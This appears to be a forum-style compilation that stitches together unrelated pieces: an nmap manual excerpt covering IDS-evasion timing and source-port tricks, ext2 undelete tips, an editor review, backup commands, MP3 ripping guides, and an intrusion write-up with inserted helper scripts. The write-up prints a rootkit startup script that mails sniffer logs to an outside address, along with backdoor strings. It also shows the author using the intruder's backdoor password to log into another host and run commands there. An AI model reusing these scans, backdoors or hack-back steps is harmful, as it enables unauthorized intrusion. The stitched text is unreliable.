UNDERCODE COMMUNITY
PART 2 NMAP FULL

-g
Sets the source port number used in the scan. Many "naive" firewalls and packet filters make an exception in their rule set so that DNS (53) or FTP-DATA (20) packets are allowed in to establish a connection, while everything else is filtered. Obviously this is a very thoughtless approach, because an intruder can just as easily send from an FTP or DNS source port. Note that nmap honours this only when it can: for example, TCP ISN sampling cannot all be done from a single host:port pair, so for that probe nmap will change the source port even when -g was given. Be aware that there may be a small performance penalty when using this option, because I sometimes store useful information in the source port number.


-M
Sets the maximum number of sockets used in parallel for TCP connect() scans (the default scan type). This is useful for slowing a scan down moderately so that it does not crash the remote host. Another way to achieve that is to use -sS.


Timing options
-------- *

Although nmap generally tries to finish the scan as quickly as it can, occasionally some hosts/ports are not detected. This may be because nmap's default timing strategy does not suit your target (it is effectively a timeout setting). Here are some options for controlling scan timing:

-T
This is a convenient way to express the priority of nmap's timing policy. Paranoid mode scans extremely slowly to avoid being logged by intrusion detection systems: it makes the scan serial rather than parallel and usually waits at least five minutes between sending packets. Sneaky is similar, except that it sends a packet every 15 seconds. Polite mode reduces the network load to lower the chance of crashing hosts: it sends probes serially and waits 0.4 seconds between packets. Normal is nmap's usual behaviour, doing its best to scan as fast as possible unless hosts or ports start being missed. Aggressive mode sets a five-minute timeout per host and waits no more than 1.25 seconds for each probe. Insane mode is for very fast networks, or for when you don't mind losing some information, because it is so fast: its per-host timeout is 75 seconds and it waits only 0.3 seconds for a response. It lets you "sweep" a fast network :). You can also give the mode as a number (0-5), e.g. '-T 0' means Paranoid and '-T 5' means Insane. Note that these timing modes cannot be used in combination with the lower-level controls given below.

--host_timeout
Specifies the total time nmap spends scanning a single IP before giving up on it. By default no limit is set.

--max_rtt_timeout
Specifies the maximum time nmap waits for the remote end to respond to a probe. The default is 9000 (milliseconds).

--initial_rtt_timeout
Specifies the timeout for the initial probes. This is mainly useful when scanning firewalled hosts with -P0, since nmap normally gets a good RTT estimate from the pings and the first few probes. The default value is 6000.

--max_parallelism
Specifies the maximum number of probes nmap may have outstanding in parallel. Setting it to 1 makes nmap scan only one port at a time. It also affects other parallel operations such as ping sweeps and RPC scans.

--scan_delay
Specifies the minimum time nmap must wait between two probes. This is another way to reduce the network load and to make the scan less visible in the logs of an intrusion detection system.

Target description
-------- *

All options that do not take parameters are treated as nmap target host descriptions. The simplest case is just listing a single host name or IP address on the command line. If you want to scan a subnet, you can append '/mask' to the host name or IP address. The mask must be between 0 (scan the entire network) and 32 (a single host). Use /24 to scan a class C address and /16 to scan a class B address.

nmap also has some more flexible notation that lets you use lists and ranges for each element of an IP address. For example, if you want to scan the class B network 128.210.*.*, you can use '128.210.*.*' or '128.210.0-255.0-255' or even '128.210.1-50,51-255.1,2,3,4,5-255'. Of course you can also use the mask notation mentioned above: '128.210.0.0/16'. All of these are equivalent. Remember that most shells require you to quote an argument that contains '*'.

Another interesting thing is that you can "slice" the address space in other ways. For example, '*.*.5.6-7' scans all IP addresses ending in .5.6 or .5.7. For more information, see the examples section.
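To make the target notation concrete, here is an added expander (not part of nmap or of this text) that turns an nmap-style target specification into the set of addresses it names, so the supposedly equivalent forms above can be compared; it also shows that the comma-list form '128.210.1-50,51-255.1,2,3,4,5-255' actually omits every address with a 0 in the third or fourth octet:

```python
from itertools import product


def expand_octet(spec):
    """Expand one octet of an nmap target spec ('*', '7', '1-50', '1,2,5-255')
    into a sorted list of integers in 0..255."""
    if spec == "*":
        return list(range(256))
    values = set()
    for part in spec.split(","):
        lo, sep, hi = part.partition("-")
        lo_n = int(lo)
        hi_n = int(hi) if sep else lo_n
        if not 0 <= lo_n <= hi_n <= 255:
            raise ValueError(f"bad octet spec {part!r}")
        values.update(range(lo_n, hi_n + 1))
    return sorted(values)


def expand_target(spec):
    """Return the set of IPv4 addresses (as 32-bit ints) named by an nmap
    target spec: either 'a.b.c.d/mask' or four octet specs with wildcards,
    ranges and comma lists (the two forms are not mixed, as in nmap)."""
    host, sep, mask = spec.partition("/")
    octets = host.split(".")
    if len(octets) != 4:
        raise ValueError(f"expected four octets in {spec!r}")
    if sep:
        bits = int(mask)
        if not 0 <= bits <= 32:
            raise ValueError("mask must be between 0 and 32")
        if bits < 16:
            # /0../15 would expand to millions of addresses in memory
            raise ValueError("refusing to expand a mask shorter than /16")
        if any(not o.isdigit() for o in octets):
            raise ValueError("/mask cannot be combined with wildcards or ranges")
        base = 0
        for o in octets:
            base = (base << 8) | expand_octet(o)[0]
        netmask = (0xFFFFFFFF << (32 - bits)) & 0xFFFFFFFF
        network = base & netmask
        return set(range(network, network + (1 << (32 - bits))))
    return {(a << 24) | (b << 16) | (c << 8) | d
            for a, b, c, d in product(*(expand_octet(o) for o in octets))}


def to_dotted(addr):
    """32-bit int back to dotted-quad text."""
    return ".".join(str((addr >> shift) & 0xFF) for shift in (24, 16, 8, 0))


def compare_specs(*specs):
    """Expand each spec and report the sizes and whether all name the same set."""
    sets = [expand_target(s) for s in specs]
    return {"sizes": [len(s) for s in sets],
            "equivalent": all(s == sets[0] for s in sets)}


if __name__ == "__main__":
    print(compare_specs("128.210.*.*", "128.210.0-255.0-255",
                        "128.210.0.0/16", "128.210.1-50,51-255.1,2,3,4,5-255"))
```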

Scanning example
-------- *

Here are some examples of nmap scans, from the simplest to the most complex. Note that they use real addresses and some real domain names, which makes the scanning behaviour more concrete; you can replace the addresses/names with those of your own network. Although analysing port-scan results may make some people uneasy, I do not think it is illegal. I have scanned hundreds or thousands of machines and received only one complaint. But I am not a lawyer, and some people are annoyed by nmap probes, so it is best to get permission before scanning, or else scan at your own risk.

nmap -v target.example.com

This scans all reserved TCP ports on target.example.com; -v means verbose mode.

nmap -sS -O target.example.com/24

This starts a SYN half-open scan against the class C subnet that target.example.com is on. It also tries to determine which operating system each host is running. This requires root privileges because it uses half-open scanning and OS detection.

nmap -sX -p 22,53,110,143,4564 128.210.*.1-127

Sends an Xmas tree scan to the first half of every subnet in the class B network 128.210. We check whether the systems are running sshd, DNS, pop3d, imapd, or something on port 4564. Note that because of deficiencies in the Microsoft TCP stack, Xmas scanning does not work against that platform. The same problem may exist with CISCO, IRIX, HP/UX, and BSDI.

nmap -v -p 80 '*.*.2.3-5'

This is a way of slicing the address space (dividing the whole network into many small parts) and then scanning it. All IP addresses ending in .2.3, .2.4, or .2.5 are scanned here. You can also use -sS if you are root. Similarly, you can search for more interesting machines starting from 127: replace the leading asterisk with '127-222'. IMHO there are a lot of interesting machines in that range.

host -l company.com | cut -d ' ' -f 4 | ./nmap -v -i -

This does a DNS zone transfer to find the hosts in company.com and feeds their IP addresses to nmap on standard input. This command runs on my GNU/Linux platform; you may need different option parameters on a different operating system.


Bugs
---- *

Bugs? What's wrong? If you find one, please tell me, and the revised version will be better :). Remember to send it to me along with the OS "fingerprints", so that I have enough data to fix it...

Author
---- *

Fyodor

Distribution
---- *

The latest version of nmap can be obtained from the following URL (the copyright information follows)

http://www.insecure.org/nmap/

nmap is (C) 1997, 1998, 1999 by Fyodor ( fyodor@dhp.com , fyodor@insecure.org )

libpcap is also distributed along with nmap. It is copyrighted by Van Jacobson, Craig Leres and Steven McCanne, all of the Lawrence Berkeley National Laboratory, University of California, Berkeley, CA. The version distributed with nmap may be modified; pristine sources are available from ftp://ftp.ee.lbl.gov/libpcap.tar.Z.
NMAP 3

This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; Version 2. This guarantees your right to use, modify, and redistribute Nmap under certain conditions. If this license is unacceptable to you, Insecure.Org may be willing to sell alternative licenses (contact fyodor@dhp.com).

🦑This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details (it is in the COPYING file of the nmap distribution).

It should also be noted that Nmap has been known to crash certain poorly written applications, TCP / IP stacks, and even operating systems. Nmap should never be run against mission critical systems unless you are prepared to suffer downtime. We acknowledge here that Nmap may crash your systems or networks and we disclaim all liability for any damage or problems Nmap could cause.

All versions of Nmap equal to or greater than 2.0 are believed (through informal testing) to be Year 2000 (Y2K) compliant in all respects. That being said, we reiterate that Nmap comes with no warranty. There is no reason to believe versions earlier than 2.0 are susceptible to problems, but we have not tested them.


Attached:

The operating platform of nmap
-------------- *

Portability
Nmap is developed under Linux, but it now runs on many platforms. Thanks to Lamont Granquist for his great help in running the Nmap automated test console on many platforms I cannot access. The following is a brief list of systems that support Nmap:

OS                      Compiles  TCP scan (-sT)  SYN scan (-sS)  FIN scan (-sF)  Frag scan (-f)  OS Detection (-O)
Linux                   Yes!      Yes!            Yes!            Yes!            Yes!            Yes!
FreeBSD                 Yes!      Yes!            Yes!            Yes!            Yes!            Yes!
OpenBSD                 Yes!      Yes!            Yes!            Yes!            Yes!            Yes!
NetBSD                  Yes!      Yes!            Yes!            Yes!            Yes!            Yes!
Solaris 2.4-7           Yes!      Yes!            Yes!            Yes!            No :(           Yes!
SunOS 4.1.4 w/ gcc      Yes!      Yes!            Yes!            Yes!            No :(           Yes!
IRIX 5.3-6.4            Yes!      Yes!            Yes!            Yes!            No :(           Yes!
HP/UX 10.20             Yes!      Yes!            Yes!            Yes!            Yes!            Unknown
BSDI 2.1 and up         Yes!      Yes!            Yes!            Yes!            Unknown         Yes!
AIX (use cc, not gcc)   Yes!      Yes!            No :(           No :(           No :(           No :(
Digital UNIX/Alpha      Yes!      Yes!            POSSIBLE KERNEL PANIC!
Cray UNICOS 10.0        Yes!      Yes!            No :(           No :(           No :(           No :(

WRITTEN BY UNDERCODE
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑NMAP A> Z BY UNDERCODE
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Miscellaneous Tools-Recover Deleted Files in ext2 File System :

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) If you accidentally deleted an important file, for example with rm -rf kkk where kkk is a file that matters a lot to you, don't panic: stop writing anything to the hard disk immediately. The file is completely recoverable. (What follows is written specifically for the ext2 file system; other file systems have their own methods, which I will write about later.)
# debugfs /dev/hda1 (the partition where the deleted file was located)
debugfs: lsdel
This lists the inode table of recently deleted files, roughly as follows:

2) Inode  Owner  Mode  Size  Blocks  Time deleted

3) These columns are the inode number, owner, file mode (i.e. read/write permissions etc.), size, blocks (generally 1 block = 1K), and the deletion time. With this information you should be able to quickly determine which file you want to recover. Then use
debugfs: dump <inode number you want to restore> /home/directory (the destination path)
OK! It's that simple; you can find the file under /home/directory.

4) Of course, if you have a lot of files, doing this one by one is troublesome; you can download tools for that. One is here:
http://revocer.sourceforge.net/linux/recover.
Try it, everyone. If you run into difficulties, post here.

5) While the brothers were practising, the following output appeared, and they did not know how to deal with it. Please enlighten me.
311543  0  100600  7603556  14/14  Wed Oct  2 18:39:21 2002
586046  0  100644     7044    2/2  Wed Oct  2 18:51:50 2002
760593  0  100600      363    1/1  Wed Oct  2 18:53:35 2002
9551 deleted inodes found.
debugfs: dump 311543
dump: Usage: dump_inode [-p] <file> <output_file>
debugfs: dump 311543 /root
311543: File not found by ext2_lookup
debugfs:

6) I want to restore inode 311543, because I deleted a file in the /root directory and saw that it was 311543, but when I used the command above to restore it, the prompt above appeared.

7) You should do it like this:

debugfs: dump <311543> /root/ppp (any file name)
Try again. Did you succeed?

8) I am under Windows right now, and my Linux uses JFS, where recovery is more convenient. Wait until I switch to Linux and build an ext2 system; I have tried it before, and it must work.


9) OK. Dude, you're terrific; I'm convinced, and it works. . . .
Now my brother has a question: I deleted a .tar.gz file, but after the restore completed I cannot extract it with
# tar zxvf *.tar.gz

10) The other question is how to restore the original file name. For example, I deleted wine.tar.gz but can't remember the exact file name, and I want to restore it under its original name. Or I deleted an important system file and don't remember what it was called, but that file name is extremely important to the system, such as mozilla under /usr/bin. How can I do this?

11) The main thing is to know why. The answer is simple. To find the file name, use
debugfs: ls -d

12) As for the file being unusable: dump assumes the blocks are contiguous, and your file may not be stored in contiguous blocks.
Use debugfs: stat <inode> to see its block list, and then dd the blocks out one by one (of course there are tools that save a lot of effort).
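An added helper for the lsdel step above (not from the thread or from debugfs itself): it parses the `lsdel` listing, decodes the octal mode column, and uses the Blocks column (blocks found/blocks total) to tell which deleted inodes still have a complete block list and are therefore safe to dump, which is exactly the case point 12 warns about. The sample listing is constructed to resemble the one posted above.

```python
import re
import stat
from dataclasses import dataclass

# Constructed sample of `debugfs: lsdel` output, modelled on the listing in the
# thread above (not captured from a real system).
SAMPLE_LSDEL = """\
 Inode  Owner  Mode    Size      Blocks   Time deleted
311543      0 100600 7603556   14/14 Wed Oct  2 18:39:21 2002
586046      0 100644    7044    2/2 Wed Oct  2 18:51:50 2002
760593      0 100600     363    1/1 Wed Oct  2 18:53:35 2002
123456      0  40755    1024    1/1 Wed Oct  2 18:55:00 2002
999001      0 100644 2097152   3/512 Wed Oct  2 19:00:00 2002
5 deleted inodes found.
"""


@dataclass
class DeletedInode:
    inode: int
    owner: int
    mode: int          # raw st_mode, parsed from the octal Mode column
    size: int
    blocks_found: int  # data blocks debugfs could still locate
    blocks_total: int  # data blocks the file originally had
    deleted_at: str

    @property
    def is_regular_file(self):
        return stat.S_ISREG(self.mode)

    @property
    def complete(self):
        # found < total means part of the block list is already gone; a dump
        # would then produce a truncated or garbled file (the .tar.gz problem).
        return self.blocks_found == self.blocks_total

    @property
    def perms(self):
        return stat.filemode(self.mode)


LINE_RE = re.compile(
    r"^\s*(\d+)\s+(\d+)\s+([0-7]+)\s+(\d+)\s+(\d+)/(\d+)\s+(.+?)\s*$")


def parse_lsdel(text):
    """Parse lsdel output; skips the header, the 'N deleted inodes found.'
    trailer and anything else that is not an inode row."""
    entries = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        inode, owner, mode, size, found, total, when = m.groups()
        entries.append(DeletedInode(int(inode), int(owner), int(mode, 8),
                                    int(size), int(found), int(total), when))
    return entries


def recoverable(entries, min_size=0):
    """Regular files whose block list is still complete, largest first."""
    return sorted((e for e in entries
                   if e.is_regular_file and e.complete and e.size >= min_size),
                  key=lambda e: e.size, reverse=True)


def dump_command(entry, out_path):
    """The debugfs command in the form point 7 arrived at: inode number in
    angle brackets and a destination file, not a directory."""
    return f"dump <{entry.inode}> {out_path}"


if __name__ == "__main__":
    for e in recoverable(parse_lsdel(SAMPLE_LSDEL)):
        print(e.inode, e.perms, e.size, e.deleted_at, "->", dump_command(e, f"/root/inode_{e.inode}"))
```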


🦑 Bluefish web editor based on Linux text mode:


1) Bluefish advertises itself as "an editor for skilled web designers and programmers", but its UI is very intuitive; any beginner can quickly get started and gradually discover and master its other features. If you need a text editor for writing web code, it is a very good piece of software. The overall impression it gives me is professional but not intimidating, and the combination of text and icons is good.

2) Bluefish provides options for many common HTML tasks, such as fonts, tables and of course links. The software uses the less common term "anchor" for clickable links. The link dialog even offers JavaScript event handlers such as onClick and onMouseOver.

3) It also has dialogs for PHP and SQL tasks, as well as many Apache and C options, and you can group files by project for development. The search-and-replace function is also very good: it supports regular expressions, and you can customise syntax highlighting for several languages.

4) Now for some of its shortcomings. If you need help from the documentation, you have to open a separate document, because help is not integrated into the application. The documentation is very extensive, and with patience you can certainly find what you want. For example, I could not find spell checking quickly, but after reading the documentation I found that you must install the separate open-source Aspell program to be able to spell-check.

5) Macros are handled through a "custom menu", where you can create your own text strings, HTML opening and closing tags, or search-and-replace commands. Creating text strings involves a few dialogs with extra features and is very simple.

6) Somewhat disappointingly, in such an intuitive interface I could not find how to edit the custom-menu macro I had created, but if you follow the steps in the documentation everything becomes clear. The macro facility may not be as powerful as in some other applications; for example, I could not find how to invoke other Bluefish commands from the custom menu, but it is very convenient for repeated input.

7) Finally, Bluefish does not position itself as an application for writing prose, and it lacks some text manipulation commands such as changing case or joining and splitting lines.

8) That said, if you are looking for a moderately featured text-based web code editor, Bluefish is definitely worth a try.


🦑 Make Incremental Backups linux :

1) The first step in creating an incremental backup is to generate a list of the files that have changed in the recent past. This is usually done with the find command.

2) For example, to generate a list of files that have changed in the last 24 hours, use:
find / -mtime -1 ! -type d -print > /tmp/filelist.daily

3) Here the -mtime -1 option makes find look for files modified within the past 24 hours, and ! -type d removes directory names from the list. To find all files changed in the past week, use:

find / -mtime -7 -print > /tmp/filelist.weekly

4) Once you have generated the list of files to back up, use the tar -T option to specify a file containing the list of files to archive. For example, to back up all files listed in /tmp/filelist.daily to the device /dev/fd0, use:

tar -cv -T /tmp/filelist.daily -f /dev/fd0


🦑Tracking a hack full tutorial by undercode :


1) I checked my machine and unexpectedly discovered it had been hacked. It was actually my own mistake: I had not patched wuftpd 2.6 and had not changed /etc/ftpusers either, so people could easily use the wuftpd 2.6 remote vulnerability to get into my machine through the anonymous user. This visitor, however, had apparently installed a rootkit without much care.

🦑 As a result, the output of ps looked like this:
[root@ns]# ps
PID TTY STAT TIME COMMAND
678 1 S 0:00 /sbin/mingetty tty1
679 2 S 0:00 /sbin/mingetty tty2
680 3 S 0:00 /sbin/mingetty tty3
681 4 S 0:00 /sbin/mingetty tty4
682 5 S 0:00 /sbin/mingetty tty5
683 6 S 0:00 /sbin/mingetty tty6
5557 ? S 0:00 /bin/sh -i
5591 ? R 0:00 ps

🦑 I think anyone knows what that means. So let's go step by step and see what he did.
[This intruder did not expect that the machine already had an owner, and installed his own rootkit toolkit.]

1) [root@ns]# strings /bin/login | more
..........
__bss_start
_end
PPRV
DISPLAY
/bin/envpc
l4m3r0x
/bin/sh

2) From the above it can be seen that this is a login backdoor: after export DISPLAY="l4m3r0x", you can telnet to the machine and get a # prompt directly.
[root@ns]# strings /bin/ls | more
.....
always
/usr/local/share/locale
fileutils
GNU fileutils-3.13
vdir
%s-%s
/dev/sgk/.fsdc/.1file
//DIRED//
//SUBDIRED//
POSIXLY_CORRECT
COLUMNS

3) Note the string /dev/sgk/.fsdc/.1file: that is where his rootkit files live, so let's see what is there
[root@ns]# mv /dev/sgk/.fsdc/.1file /tmp
[root@ns]# ls -la /dev/sgk/.fsdc
total 641
drwxr-xr-x 5 root ftp 1024 Feb 4 09:01 .
drwxr-xr-x 3 root ftp 1024 Feb 2 17:11 ..
-rw-r--r-- 1 root ftp 7 Feb 2 17:11 .1logz
-rw-r--r-- 1 root ftp 88 Feb 2 17:11 .1proc
drwxr-xr-x 2 root ftp 1024 Feb 2 17:11 backup
drwxrwxr-x 2 undercode 1024 Feb 2 17:14 clean
-rwxr-xr-x 1 undercode 5578 Nov 18 11:08 filetrans
-rwxr-xr-x 1 undercode 9396 Aug 23 killall-real
-rwxr-xr-x 1 undercode 7578 Aug 21 17:22 parse
-rwxr-xr-x 1 undercode 6232 Sep 9 parse1
drwxrwxr-x 2 undercode 1024 Jan 28 16:34 patches
-rwxr-xr-x 1 undercode 28004 Aug 23 ps-real
-rwxr-xr-x 1 undercode 580696 Feb 18 2000 ssh
-rw-r--r-- 1 root ftp 1398 Feb 4 08:55 system

4) Oh, it seems there are quite a lot of things here. From the ftp group we can tell he used the ftp vulnerability, and from lujiang we can tell he also stole a local user account.
[root@ns .fsdc]# cat .1logz
rshd
[root@ns .fsdc]# cat .1proc
3 nscd
2 nmap
2 lscan
2 login
2 lpset
2 xtty
2 nscd
3 statd
3 lpq
3 scan
3 sniff
3 envpc
[root@ns .fsdc]# cat /tmp/.1file
sgk
.fsdc
.clib
.1proc
.1addr
.1file
.1logz
envpc
xtty
pttys
filetrans
lpset
libload
system
parse

5) .1logz is read by the trojaned syslogd and hides the log records generated by the listed commands.
.1proc is read by the trojaned ps and hides the listed process names.
.1file lists the file names that the trojaned ls hides.
[root@ns .fsdc]# cd patches
[root@ns patches]# cat patch.sh
#!/bin/sh
echo "[1] Patching WU-FTPd..."
rpm -Uhv wuftpd.rpm
echo "[2] Patching NFS-utils..."
rpm -Fvh nfs-utils.rpm
ps aux >> /tmp/psaux
if [ "`cat /tmp/psaux | grep rpc.statd`" ]; then
echo "[3] Restarting the rpc.statd daemon (NFS-utils)"
/etc/rc.d/init.d/nfslock restart
else
echo "[4] The daemon rpc.statd isn't running, so no need to restart!"
fi
rm /tmp/psaux

6) This is a patch package for the wuftpd and rpc.statd vulnerabilities.
I did not read the other files and directories carefully [the download package will be provided].
Following the hidden-file list in .1file, let's find these files one by one.
[root@ns .fsdc]# strings /usr/bin/xtty
......
PPRV
(nfsiod)
socket
bind
listen
accept
/bin/sh
7) It is not hard to see that this is a backdoor: it sets up a listening socket (socket/bind/listen/accept) and hands the connection to /bin/sh, while calling itself (nfsiod).
[root@ns .fsdc]# strings /dev/pttys
#!/bin/sh
cat /dev/sgk/.fsdc/system | mail prosupp@usa.net > /dev/null 2>&1
nohup /usr/lib/lpset > /dev/null &
nohup /usr/bin/xtty > /dev/null &
rm -rf nohup.out
This hacker is quite smart: this script mails the sniffer records to prosupp@usa.net [/dev/sgk/.fsdc/system is the sniffer log].
[root@ns .fsdc]# cat /etc/rc.d/rc.sysinit | more
..........
if [ "$PROMPT" != "no" ]; then
/sbin/getkey i && touch /var/run/confirm
fi
wait
# Name Server Cache Daemon..
/usr/sbin/nscd -q
# Name Server Cache Daemon..
/usr/sbin/nscd -q
# Kernel module checker
/usr/lib/libload > /dev/null 2>&1
[root@ns bak]# strings /usr/sbin/nscd | more
+Q$9
/usr/info/.clib/sshd_config
Received SIGHUP; restarting.
RESTART FAILED: av[0]='%.100s', error: %.100s.
Received signal %d; terminating.
Timeout before authentication.
Generating new %d bit RSA key.
RSA key generation complete.
f:p:b:k:h:g:diqV:
i686-unknown-linux
1.2.27
sshd version %s [%s]
Usage: %s [options]
Options:
/usr/info/.clib holds an ssh backdoor (the "nscd" started from rc.sysinit is really an sshd 1.2.27 with its own config), so the machine opens a convenient door for the hacker after every startup.
[root@ns .fsdc]# strings /sbin/syslogd
==================================================================
Time: %s Size: %d
Path: %s
 => %s [%d]
------------------------------------------------------------
Exiting...
cant get SOCK_PACKET socket
cant get flags
cant set promiscuous mode
/dev/null
eth0
system
cant open log

🦑 This hacker replaced the syslogd binary with a sniffer.

. . . . . . . . . .
The next step is to restore the system and change the passwords of the stolen accounts; I will not go into that here. From my own sniffer records I know that he came from these two machines.

[root@ns man]# more system2
==================================================================
Time: Fri Feb 2 17:26:07 Size: 1056
Path: 210.217.237.75 => ns.xxx.cn [21]
------------------------------------------------------------

🦑 From the above we know that the attack came from 210.217.237.75. Out of habit, the same backdoor is usually installed, so
[root@ns man]# export DISPLAY="l4m3r0x"
[root@ns man]# telnet 210.217.237.75
Trying 210.217.237.75...
Connected to 210.217.237.75.
Escape character is '^]'.

> Boramae Cache Server 3.5.1

bash# w
> 7:48pm up 71 days, 9:43, 1 user, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root tty1 - 25Nov 0 31days 0.08s 0.05s -bash
undercode testing root
bash# ps -ef
PID TTY STAT TIME COMMAND
940 2 S 0:00 /sbin/mingetty tty2 HOME=/ TERM=linux BOOT_IMAGE=linux AUTO
941 3 S 0:00 /sbin/mingetty tty3 HOME=/ TERM=linux BOOT_IMAGE=linux AUTO
942 4 S 0:00 /sbin/mingetty tty4 HOME=/ TERM=linux BOOT_IMAGE=linux AUTO
943 5 S 0:00 /sbin/mingetty tty5 HOME=/ TERM=linux BOOT_IMAGE=linux AUTO
944 6 S 0:00 /sbin/mingetty tty6 HOME=/ TERM=linux BOOT_IMAGE=linux AUTO
957 1 S 0:00 -bash HOME=/root PATH=/sbin:/bin:/usr/sbin:/usr/bin SHELL=/
22151 ? S 0:00 -bash HOME=/root USER=root LOGNAME=root PATH=/usr/bin:/bin:
22178 ? S 0:00 \_ ../ssh -l pthl mega.ee.tu-berlin.de LESSOPEN=|/usr/bin/
. . . . . . . . . .
3) Use the rpm command to check whether commonly used commands have been modified.
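For the last step, here is an added triage helper (not from the write-up above) that reads `rpm -V` style verification output and flags package-owned files whose contents or metadata no longer match the database, giving priority to the system commands this intrusion trojaned (ls, login, ps, syslogd, nscd). The sample output and the watch list are constructed for the example.

```python
# Constructed sample of `rpm -Va` output, not taken from the compromised host.
# Each line: attribute string (S size, M mode, 5 digest, D device, L symlink,
# U user, G group, T mtime; '.' = unchanged), an optional file-type marker
# (c = config file, d = documentation), then the path. "missing" means the
# package owns the file but it is gone from disk.
SAMPLE_RPM_VERIFY = """\
S.5....T    /bin/ls
S.5....T    /bin/login
S.5....T    /bin/ps
S.5....T    /sbin/syslogd
..5....T    /usr/sbin/nscd
S.5....T  c /etc/ftpusers
.......T    /usr/bin/vdir
.M......    /usr/lib/locale/README
missing     /usr/sbin/in.ftpd
"""

# Binaries the write-up found replaced, plus the usual rootkit targets
# (constructed watch list; extend it for your own distribution).
CRITICAL = {"/bin/ls", "/bin/login", "/bin/ps", "/sbin/syslogd",
            "/usr/sbin/nscd", "/usr/bin/killall", "/sbin/ifconfig", "/bin/netstat"}

FLAG_NAMES = {"S": "size", "M": "mode", "5": "digest", "D": "device",
              "L": "symlink", "U": "user", "G": "group", "T": "mtime"}
FILE_MARKERS = {"c", "d", "g", "l", "r"}


def parse_rpm_verify(text):
    """Return (path, changed_attributes, is_config, missing) per output line."""
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        parts = line.split(None, 2)            # attrs, [marker], path
        if parts[0] == "missing":
            rows.append((parts[-1], set(), False, True))
            continue
        if len(parts) == 3 and parts[1] in FILE_MARKERS:
            marker, path = parts[1], parts[2]
        else:                                  # no marker; path may contain spaces
            marker, path = "", " ".join(parts[1:])
        changed = {FLAG_NAMES[ch] for ch in parts[0] if ch in FLAG_NAMES}
        rows.append((path, changed, marker == "c", False))
    return rows


def suspicious_changes(rows, critical=CRITICAL):
    """Classify verify results as (path, reason, is_critical), critical first.
    Config files are skipped (admins edit them; review them separately) and an
    mtime-only change is ignored, since it does not alter what the file does."""
    findings = []
    for path, changed, is_config, missing in rows:
        if missing:
            findings.append((path, "missing", path in critical))
        elif is_config:
            continue
        elif changed & {"size", "digest"}:
            findings.append((path, "content changed", path in critical))
        elif changed & {"mode", "user", "group", "symlink", "device"}:
            findings.append((path, "metadata changed", path in critical))
    return sorted(findings, key=lambda f: (not f[2], f[0]))


if __name__ == "__main__":
    for path, reason, crit in suspicious_changes(parse_rpm_verify(SAMPLE_RPM_VERIFY)):
        print(("CRITICAL " if crit else "         ") + f"{reason:17} {path}")
```

The rpm database and the rpm binary itself live on the compromised disk, so a clean verdict from this check is only meaningful when run from trusted media (or against the original package files with rpm -Vp); a dirty verdict, as here, is reliable evidence.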


🦑Beautify and Finish-Make MP3s under Linux by undercode :


> Many friends who like music will try to make MP3s from their CDs on their computers. Linux users can of course make their own MP3s too; this is not a Windows/Mac monopoly. This time I will introduce two Linux programs for making MP3s.

My favourite is Grip, written with GTK+.

1) Grip is not actually an MP3 encoder or a CD ripper. It just provides a simple and easy-to-use graphical interface so that you do not have to use the command line to make MP3s.

2) As for CD rippers (programs that grab CD tracks), Grip supports cdparanoia and cdda2wav. For MP3 encoders it supports bladeenc, lame, l3enc, xingmp3enc, mp3encode and gogo, among others, which is very convenient! I use cdparanoia and bladeenc.

🦑 The following are the URLs of some CD rippers / MP3 encoders:


1) CD ripper
· cdparanoia
http://www.xiph.org/paranoia
· cdda2wav
ftp://ftp.gwdg.de/pub/linux../misc/cdda2wav

2) MP3 encoder
· BladeEnc
http://bladeenc.mp3.no
· LAME
http://www.sulaco.org/mp3
· gogo
http://homepage1.nifty.com/herumi/gogo_e.html

3) Choose one CD ripper and one MP3 encoder; once they are installed you can use Grip. If you use RPMs, I suggest cdparanoia/cdda2wav + gogo. Their RPMs can be downloaded from the following URLs:
cdparanoia RPM
http://rpmfind.net/linux/RPM/redhat...9.6-2.i386. html
cdda2wav RPM
http://rpmfind.net/linux/RPM/redhat...1.8-2.i386.html
gogo RPM
http://www.aial.hiroshima-u.ac.jp/~...2.35- 1.i386.rpm

4) If you use Debian / Corel / Storm Linux, you can use the two Debian packages cdparanoia and cdda2wav, but because of copyright issues Debian has no MP3 encoder package; you need to install one yourself.

5) After you have installed the CD ripper and MP3 encoder, you can use Grip to make MP3s. Grip's website is: http://www.nostatic.org/grip
You can download its RPM package from "http://www.nostatic.org/grip/grip-2.94-1.i386.rpm"; the Debian package grip can be downloaded and installed with apt-get.

6) Run the command grip and you will see Grip's main window. First we need to set up the CD ripper and MP3 encoder to use. Click the Config tab, select Rip, and choose the installed CD ripper in the Ripper field. Then select MP3 under Config and choose an installed MP3 encoder in the Encoder field.

7) Then put your beloved audio CD into the CD-ROM drive, and you will see the table under Tracks update automatically. If you have time, click the "pencil" button at the bottom to give the CD and its tracks proper names. In the table, right-click to select a song. After selecting, go to the Rip tab and press Rip+Encode; the selected tracks will be turned into MP3s. Grip can also rip part of a track: select Rip partial track, press Play, note the sectors at the beginning and end of the part you want, and enter them in Start sector and End sector respectively. When the process completes, the created MP3s will be in the mp3 directory under your home directory, i.e. ~/mp3/.

🦑 KDE Department: Krabber

1) Krabber is another front end for CD rippers and MP3 encoders. Krabber is developed with the Qt and KDE libraries, so only KDE users can use it. This is a major disadvantage of Krabber... (I had not used KDE, and had to install it). Krabber supports cdparanoia, 8hz-mp3, lame, encode, bladeenc, l3enc, mp3enc and xingmp3enc, and it can automatically detect whether the system has the required components.
2) It needs mpg123 to play MP3s. Krabber's settings are similar to Grip's: Format selects the installed MP3 encoder, and the first box in Generic Options selects your input device, such as /dev/hdc (the CD-ROM drive). One feature Krabber has that Grip does not is adjusting CPU usage, so that you can encode MP3s while working. Krabber is fairly easy to use; just follow its four steps:
choose a song, choose a directory, choose a file name, and execute.
Krabber website: http://krabber.automatix.de
KDE website: http://www.kde.org


